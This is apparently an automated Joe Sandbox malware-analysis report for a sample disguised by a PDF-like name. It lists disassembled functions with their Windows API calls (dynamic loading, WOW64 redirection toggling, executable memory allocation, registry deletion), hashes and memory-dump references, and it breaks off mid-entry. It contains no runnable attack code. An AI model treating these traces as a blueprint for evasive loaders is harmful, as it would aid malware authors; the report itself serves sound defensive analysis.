                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #$+
                                                                          • API String ID: 0-2552117581
                                                                          • Opcode ID: 43a8e6954e139e522e74beacaf0189725226d10e3f21262a9506228d70dddb39
                                                                          • Instruction ID: 5d4e9c75761b9263e1a667f68873513168546bccd020d622f4acf610b4574abf
                                                                          • Opcode Fuzzy Hash: 43a8e6954e139e522e74beacaf0189725226d10e3f21262a9506228d70dddb39
                                                                          • Instruction Fuzzy Hash: FA5101755046469FDF26AF29D888AFE7BE4FF19310F2440A5EC919B2E0DB349D42CB60
                                                                          Function 00AF62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$_memmove
                                                                          • String ID: ERCP
                                                                          • API String ID: 2532777613-1384759551
                                                                          • Opcode ID: 9cff7d90b3edefcbedddc6009d94ec0d46b6d91dc42e5744e8a00d128476c3ac
                                                                          • Instruction ID: ae2c22e81e36854755efee6a740aacf2128a7987e1b0caddfa66bc9b6f4f8740
                                                                          • Opcode Fuzzy Hash: 9cff7d90b3edefcbedddc6009d94ec0d46b6d91dc42e5744e8a00d128476c3ac
                                                                          • Instruction Fuzzy Hash: 6551A5719007099BDB24DF95C981BEABBF8EF04715F2085AEEA4ADB241E771D584CB40
                                                                          Function 00B67BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B6F910,00000000,?,?,?,?), ref: 00B67C4E
                                                                          • GetWindowLongW.USER32 ref: 00B67C6B
                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B67C7B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long
                                                                          • String ID: SysTreeView32
                                                                          • API String ID: 847901565-1698111956
                                                                          • Opcode ID: a01bf71fd0abf4bc1594198557fb3b02c0bff71912bf1dce3ac4e0bb623b08cd
                                                                          • Instruction ID: 02ff54d31defc5d78dca0117606a7c2d10764faa0dd34c855dd8c8e06ad24695
                                                                          • Opcode Fuzzy Hash: a01bf71fd0abf4bc1594198557fb3b02c0bff71912bf1dce3ac4e0bb623b08cd
                                                                          • Instruction Fuzzy Hash: B3319C31244206ABDB118F38DC45BEA77E9EB49328F244765F875A32E0DB39EC919B50
                                                                          Function 00B67648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B676D0
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B676E4
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B67708
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window
                                                                          • String ID: SysMonthCal32
                                                                          • API String ID: 2326795674-1439706946
                                                                          • Opcode ID: dd135e73f5253f3dd1dd28d1a4e2db2101d518efb61590fe558f65311d0d96eb
                                                                          • Instruction ID: e4dfebb0af720eae67136ba89d7507b5796bacfcf47b5b71079701f95d9cf0ba
                                                                          • Opcode Fuzzy Hash: dd135e73f5253f3dd1dd28d1a4e2db2101d518efb61590fe558f65311d0d96eb
                                                                          • Instruction Fuzzy Hash: 4A21D132544219BBDF11CFA4CC86FEA3BB9EF48718F110254FE156B1D0DAB5AC508BA0
                                                                          Function 00B66F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B66FAA
                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B66FBA
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B66FDF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$MoveWindow
                                                                          • String ID: Listbox
                                                                          • API String ID: 3315199576-2633736733
                                                                          • Opcode ID: aca76ee4f15a160f4680b79f94eb3513477bcd731495ba963a7f0d925746b0b8
                                                                          • Instruction ID: 8e1be360e57057e1fb1a99a728ed958d6a073f2b8e2ce1c0016f99f2e09a76d7
                                                                          • Opcode Fuzzy Hash: aca76ee4f15a160f4680b79f94eb3513477bcd731495ba963a7f0d925746b0b8
                                                                          • Instruction Fuzzy Hash: 7D21A172610118BFDF118F54EC85FBB3BAAEF89764F018164FA149B1A0CA75AC51CBA0
                                                                          Function 00B6797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B679E1
                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B679F6
                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B67A03
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: msctls_trackbar32
                                                                          • API String ID: 3850602802-1010561917
                                                                          • Opcode ID: e01dbfedd46639750f31f50128811a1df2f53d88217163de0a73ee7ad9f45187
                                                                          • Instruction ID: 94c8f9b565d32d8dab937902f6ef040a16d0ac1ea58243a25838fdfd8d8071c2
                                                                          • Opcode Fuzzy Hash: e01dbfedd46639750f31f50128811a1df2f53d88217163de0a73ee7ad9f45187
                                                                          • Instruction Fuzzy Hash: F211E772294208BADF109F70CC45FAB37E9EF89768F110519FA41A70E0D6759851CB60
                                                                          Function 00AE4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00AE4C2E), ref: 00AE4CA3
                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AE4CB5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                          • API String ID: 2574300362-192647395
                                                                          • Opcode ID: ae78e103a9072c715cd90e514ce4c5a5ce414fd68712f2c0ffb9763b5ead8d6b
                                                                          • Instruction ID: 961b373b067470ea6a2e4ca6a1ddb77357daf7c7e44338afbed0a6aeb64919e5
                                                                          • Opcode Fuzzy Hash: ae78e103a9072c715cd90e514ce4c5a5ce414fd68712f2c0ffb9763b5ead8d6b
                                                                          • Instruction Fuzzy Hash: 44D05B30510723CFD7209F32ED5871676D9AF05791B25CC7DD885D71A0DBB8D480C650
                                                                          Function 00AE4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00AE4CE1,?), ref: 00AE4DA2
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AE4DB4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-1355242751
                                                                          • Opcode ID: efabf278cbcba020795a061cfa151a61db1097236187ba5013bea9c2ab3be3aa
                                                                          • Instruction ID: e81970fa7f96051af6408d891ebe2fd32f4e755e1f86689a5e90b9e1cae49b4c
                                                                          • Opcode Fuzzy Hash: efabf278cbcba020795a061cfa151a61db1097236187ba5013bea9c2ab3be3aa
                                                                          • Instruction Fuzzy Hash: 5AD01231550713CFD7209F31EC4879676D8AF09395B158879D8C5D61A0DBB4D480C650
                                                                          Function 00AE4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00AE4D2E,?,00AE4F4F,?,00BA62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AE4D6F
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AE4D81
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-3689287502
                                                                          • Opcode ID: 90bc526678b3d974d2ed80ce7a431afc6b3ff18cd68c54b441c85ce90e8f7100
                                                                          • Instruction ID: ab134ef772330e332d65d35ea9094aa66300b3dffabf0f6d3ada002062bf616d
                                                                          • Opcode Fuzzy Hash: 90bc526678b3d974d2ed80ce7a431afc6b3ff18cd68c54b441c85ce90e8f7100
                                                                          • Instruction Fuzzy Hash: 99D01230510753CFD7209F31EC4876676D8BF1A391B158879D486D66A0DAB4D480CA50
                                                                          Function 00B61072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00B612C1), ref: 00B61080
                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B61092
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                          • API String ID: 2574300362-4033151799
                                                                          • Opcode ID: 7f5afdec3733b0844c8078e6abfc5eb4b47a198e5b15da5f1563daa52a0074a7
                                                                          • Instruction ID: a3eb2e0a6d4b3d2fad2ef996e2185fe2989a73109381b9fc70ee8aea8cb78abe
                                                                          • Opcode Fuzzy Hash: 7f5afdec3733b0844c8078e6abfc5eb4b47a198e5b15da5f1563daa52a0074a7
                                                                          • Instruction Fuzzy Hash: 1CD01231510713CFDB205F35E918A2676E4EF05791B15DC79E585D61A0DBB8C4C0C650
                                                                          Function 00B593F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B59009,?,00B6F910), ref: 00B59403
                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B59415
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                          • API String ID: 2574300362-199464113
                                                                          • Opcode ID: a9aaf494437667c0b579ae24ca2e5d41b27e4ae9ce2cb6cfd859f01ec653f6dc
                                                                          • Instruction ID: f4ef858ec8468322d6a32f72f0c36b92b5aaffb22828e17cdd6f8a4f00d5badc
                                                                          • Opcode Fuzzy Hash: a9aaf494437667c0b579ae24ca2e5d41b27e4ae9ce2cb6cfd859f01ec653f6dc
                                                                          • Instruction Fuzzy Hash: F5D01734514713CFDB209F31E90971676E5EF06392B15C8BAE886E66A0EAB8C884DA50
                                                                          Function 00B21B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: LocalTime__swprintf
                                                                          • String ID: %.3d$WIN_XPe
                                                                          • API String ID: 2070861257-2409531811
                                                                          • Opcode ID: 3a0c8c9c2155c705731cf54ee1d29ceb5d89b27a0f7dc7a0ca1cb27ae3c89afe
                                                                          • Instruction ID: c07b68cde15da104a931ffedfb1af1484e95cc77a999d0d09a55c11ecb18db68
                                                                          • Opcode Fuzzy Hash: 3a0c8c9c2155c705731cf54ee1d29ceb5d89b27a0f7dc7a0ca1cb27ae3c89afe
                                                                          • Instruction Fuzzy Hash: 40D01271C08168EACB049B94AC888F977FCAB18311F1049E2F90A92040F2749B859B21
                                                                          Function 00B376C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7af0f85e6ad9413c4e28454049037190cd52bf66e1cd0bce691a31c7451c9669
                                                                          • Instruction ID: 46ad21119fbe3951d4964e5acfbffe6b980953710c658191b0f9e63e8ac3b3d4
                                                                          • Opcode Fuzzy Hash: 7af0f85e6ad9413c4e28454049037190cd52bf66e1cd0bce691a31c7451c9669
                                                                          • Instruction Fuzzy Hash: 36C12AB5A44216EFCB24CF94C884AAEB7F5FF48714B2186D9E805EB251DB30DD41DB90
                                                                          Function 00B5E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?), ref: 00B5E3D2
                                                                          • CharLowerBuffW.USER32(?,?), ref: 00B5E415
                                                                            • Part of subcall function 00B5DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B5DAD9
                                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B5E615
                                                                          • _memmove.LIBCMT ref: 00B5E628
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                                          • String ID:
                                                                          • API String ID: 3659485706-0
                                                                          • Opcode ID: 932ed11ca95bccd48b7e766b85eb427bb340300eb28a3fc7a80a7f5efe0af81d
                                                                          • Instruction ID: 0d40eb06b7f30e4f6b88423d22ccf05e0a991b4f7fe072514947f8ff4a7a31b9
                                                                          • Opcode Fuzzy Hash: 932ed11ca95bccd48b7e766b85eb427bb340300eb28a3fc7a80a7f5efe0af81d
                                                                          • Instruction Fuzzy Hash: 0BC16E716083519FC714DF28C480A6ABBE4FF48714F1489ADF8A99B351D771EA49CF82
                                                                          Function 00B583A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 00B583D8
                                                                          • CoUninitialize.OLE32 ref: 00B583E3
                                                                            • Part of subcall function 00B3DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B3DAC5
                                                                          • VariantInit.OLEAUT32(?), ref: 00B583EE
                                                                          • VariantClear.OLEAUT32(?), ref: 00B586BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                          • String ID:
                                                                          • API String ID: 780911581-0
                                                                          • Opcode ID: 91b118200f88c9aa1353901598b3527eeb6c7e3204ace4303ae9b925e7a81029
                                                                          • Instruction ID: bc3bacf87ce59e9eb88ce345283954a762e9a4ad0a89af83c076656020fdd512
                                                                          • Opcode Fuzzy Hash: 91b118200f88c9aa1353901598b3527eeb6c7e3204ace4303ae9b925e7a81029
                                                                          • Instruction Fuzzy Hash: 06A138752047419FDB10EF15C581B2AB7E4FF88355F144499F99AAB3A2DB30ED04CB92
                                                                          Function 00B37A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B72C7C,?), ref: 00B37C32
                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B72C7C,?), ref: 00B37C4A
                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00B6FB80,000000FF,?,00000000,00000800,00000000,?,00B72C7C,?), ref: 00B37C6F
                                                                          • _memcmp.LIBCMT ref: 00B37C90
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                          • String ID:
                                                                          • API String ID: 314563124-0
                                                                          • Opcode ID: 4b37b0743431afc3cfaa8fe5e57af2c00ceb0aba357ea7beabe7efaf2a7b5155
                                                                          • Instruction ID: 0580430ede6ec63d305d1729a194f53b921de634b15d8120947333508c138565
                                                                          • Opcode Fuzzy Hash: 4b37b0743431afc3cfaa8fe5e57af2c00ceb0aba357ea7beabe7efaf2a7b5155
                                                                          • Instruction Fuzzy Hash: EE811B75A00109EFCB14DF94C994EEEB7F9FF89315F208198E515AB250DB71AE05CB60
                                                                          Function 00B36DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
